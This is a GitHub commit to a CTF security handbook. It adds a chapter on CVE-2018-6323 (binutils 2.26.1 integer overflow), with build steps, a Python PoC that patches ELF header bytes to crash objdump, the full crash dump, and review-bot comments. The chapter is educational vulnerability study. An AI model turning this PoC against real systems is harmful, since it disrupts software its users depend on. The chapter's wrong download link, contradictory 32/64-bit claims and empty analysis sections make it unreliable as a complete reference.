Commit
add 7.1.7
firmianay committed Feb 15, 2018
1 parent c9a2f60 commit fc5f183
Showing 6 changed files with 140 additions and 7 deletions.
2 changes: 1 addition & 1 deletion FAQ.md
@@ -18,7 +18,7 @@ CTF 是网络安全技术人员之间进行技术竞技的一种比赛形式,

- 有 pdf/epub/mobi 版本吗?

没有 epub/mobi 版本。暂时有 pdf,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。
,可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。


- 我能打印本书或者作为教材教课吗?
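Review bot: the rendered diff has lost its +/- markers, so the FAQ change shows up as two near-duplicate lines; what it appears to do is join the dangling fragment ",可在 GitBook 页面下载,未来考虑使用 Tex/LaTex 编写和编译,以提供更美观的 pdf。" back onto the sentence it was split from, which is the right fix. While the line is being touched, "Tex/LaTex" should be spelled "TeX/LaTeX".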
4 changes: 4 additions & 0 deletions README.md
@@ -22,6 +22,10 @@ PDF 文件地址:
---
请查看 [CONTRIBUTION.md](CONTRIBUTION.md)

常见问题
---
请查看 [FAQ.md](FAQ.md)

致谢
---
请查看 [THANKS](THANKS)
1 change: 1 addition & 0 deletions SUMMARY.md
@@ -132,6 +132,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
* [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](doc/7.1.4_wget_2017-13089.md)
* [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](doc/7.1.5_glibc_2018-1000001.md)
* [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](doc/7.1.6_dnstracer_2017-9430.md)
* [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](doc/7.1.7_binutils_2018-6323.md)
* [八、附录](doc/8_appendix.md)
* [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
* [8.2 更多 Windows 工具](doc/8.2_wintools.md)
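Review bot: the new 7.1.7 entry writes the identifier with a plain hyphen (CVE-2018-6323), matching 7.1.4 and 7.1.6, but the neighbouring 7.1.5 context line still carries an en dash (CVE–2018-1000001), which breaks copy-pasting the ID into a CVE search; worth normalising to a hyphen in the same pass since the line is already in the hunk's context.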
110 changes: 110 additions & 0 deletions doc/7.1.7_binutils_2018-6323.md
@@ -0,0 +1,110 @@
# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow

- [漏洞描述](#漏洞描述)
- [漏洞复现](#漏洞复现)
- [漏洞分析](#漏洞分析)
- [参考资料](#参考资料)


[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)

## 漏洞描述

## 漏洞复现
| |推荐使用的环境 | 备注 |
| --- | --- | --- |
| 操作系统 | Ubuntu 16.04 | 体系结构:64 位 |
| 调试器 | gdb-peda| 版本号:7.11.1 |
| 漏洞软件 | binutils | 版本号:2.26.1 |

编译安装 binutils:
```
$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz
$ tar zxvf binutils-2.26.1.tar.gz
$ cd binutils-2.26.1/
$ ./configure --enable-64-bit-bfd
$ make && sudo make install
$ file /usr/local/bin/objdump
/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped
```

使用 PoC 如下:
```python
import os

hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()

os.system("gcc -c helloWorld.c -o test")

f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()

os.system("objdump -x test")
```
```
$ python poc.py
objdump: test: File truncated
*** Error in `objdump': free(): invalid pointer: 0x09803aa8 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377]
/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7]
/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31]
objdump[0x81421cb]
objdump[0x8091ab0]
objdump[0x809349c]
objdump[0x809400a]
objdump[0x80522aa]
objdump[0x804c17e]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637]
objdump[0x804c38a]
======= Memory map: ========
08048000-0822c000 r-xp 00000000 08:01 270806 /usr/local/bin/objdump
0822c000-0822d000 r--p 001e3000 08:01 270806 /usr/local/bin/objdump
0822d000-08231000 rw-p 001e4000 08:01 270806 /usr/local/bin/objdump
08231000-08237000 rw-p 00000000 00:00 0
09802000-09823000 rw-p 00000000 00:00 0 [heap]
b7200000-b7221000 rw-p 00000000 00:00 0
b7221000-b7300000 ---p 00000000 00:00 0
b7353000-b736f000 r-xp 00000000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b736f000-b7370000 rw-p 0001b000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1
b7387000-b7587000 r--p 00000000 08:01 141924 /usr/lib/locale/locale-archive
b7587000-b7588000 rw-p 00000000 00:00 0
b7588000-b7738000 r-xp 00000000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b7738000-b773a000 r--p 001af000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773a000-b773b000 rw-p 001b1000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so
b773b000-b773e000 rw-p 00000000 00:00 0
b773e000-b7741000 r-xp 00000000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7741000-b7742000 r--p 00002000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7742000-b7743000 rw-p 00003000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so
b7751000-b7752000 rw-p 00000000 00:00 0
b7752000-b7759000 r--s 00000000 08:01 139343 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache
b7759000-b775a000 r--p 00741000 08:01 141924 /usr/lib/locale/locale-archive
b775a000-b775c000 rw-p 00000000 00:00 0
b775c000-b775e000 r--p 00000000 00:00 0 [vvar]
b775e000-b7760000 r-xp 00000000 00:00 0 [vdso]
b7760000-b7782000 r-xp 00000000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7782000-b7783000 rw-p 00000000 00:00 0
b7783000-b7784000 r--p 00022000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
b7784000-b7785000 rw-p 00023000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so
bf85b000-bf87c000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
```

需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`,将会出现下面的结果:
```
$ python poc.py
objdump: test: File format not recognized
```


## 漏洞分析

## 参考资料
- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/)
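Review bot: the download link `[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430)` points at the 7.1.6 DNSTracer directory, but this commit adds the PoC under `src/exploit/7.1.7_binutils_2018-6323/`, so the link should be `../src/exploit/7.1.7_binutils_2018-6323`. Two further points in this file: the environment table states "体系结构:64 位", yet the `file` output ("ELF 32-bit LSB executable, Intel 80386") and the memory map (`/lib/i386-linux-gnu/libc-2.23.so`) show a 32-bit system, so either the table or the transcript is wrong and readers on a genuine 64-bit host may get different behaviour; and the "漏洞描述" and "漏洞分析" headings have no body, so the page documents a crash reproduction without saying what the integer overflow is or where in binutils it lives. At minimum a one-paragraph description drawn from the referenced exploit-db entry, or an explicit TODO marker, would stop readers from taking the page as finished.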
13 changes: 7 additions & 6 deletions doc/7_exploit.md
@@ -1,8 +1,9 @@
# 第七篇 实战篇

- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md)
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md)
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md)
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md)
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md)
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md)
- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md)
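Review bot: six list entries are removed and re-added with no visible difference (7 additions and 6 deletions for what is a one-line addition), which points to a whitespace-only change such as trailing spaces or a line-ending conversion; leaving those lines untouched and appending only the 7.1.7 entry would keep `git blame` and the history readable. The 7.1.5 entry's en dash in "CVE–2018-1000001" is also carried over unchanged; replacing it with a hyphen would make the identifier searchable.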
17 changes: 17 additions & 0 deletions src/exploit/7.1.7_binutils_2018-6323/poc.py
@@ -0,0 +1,17 @@
import os

hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}"
f = open("helloWorld.c", 'w')
f.write(hello)
f.close()

os.system("gcc -c helloWorld.c -o test")

f = open("test", 'rb+')
f.read(0x2c)
f.write("\xff\xff") # 65535
f.read(0x244-0x2c-2)
f.write("\x00\x00\x00\x20") # 536870912
f.close()

os.system("objdump -x test")

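Review bot: the PoC only runs under Python 2: `f.write("\xff\xff")` and `f.write("\x00\x00\x00\x20")` pass str objects to a file opened with `'rb+'`, which raises TypeError on Python 3, so either state the interpreter requirement in a comment or use bytes literals (`b"\xff\xff"`). Positioning with `f.read(0x2c)` and `f.read(0x244-0x2c-2)` before each write relies on switching from reading to writing with no intervening seek, which C stdio leaves undefined and which Python 2's file object inherits; `f.seek(0x2c)` and `f.seek(0x244)` say what is meant and are portable. The offsets 0x2c and 0x244 are magic numbers tied to the exact object layout gcc emits for helloWorld.c on this machine, and the comments `# 65535` and `# 536870912` only restate the values; a comment naming which ELF header fields are being patched would let a reader check the offsets on another toolchain. Finally, `os.system("objdump -x test")` runs whichever objdump is first in PATH, while the document's build step installs to /usr/local/bin; invoking `/usr/local/bin/objdump` explicitly avoids testing the distribution's patched binary by mistake, which is the likely cause of a confusing "File format not recognized" result.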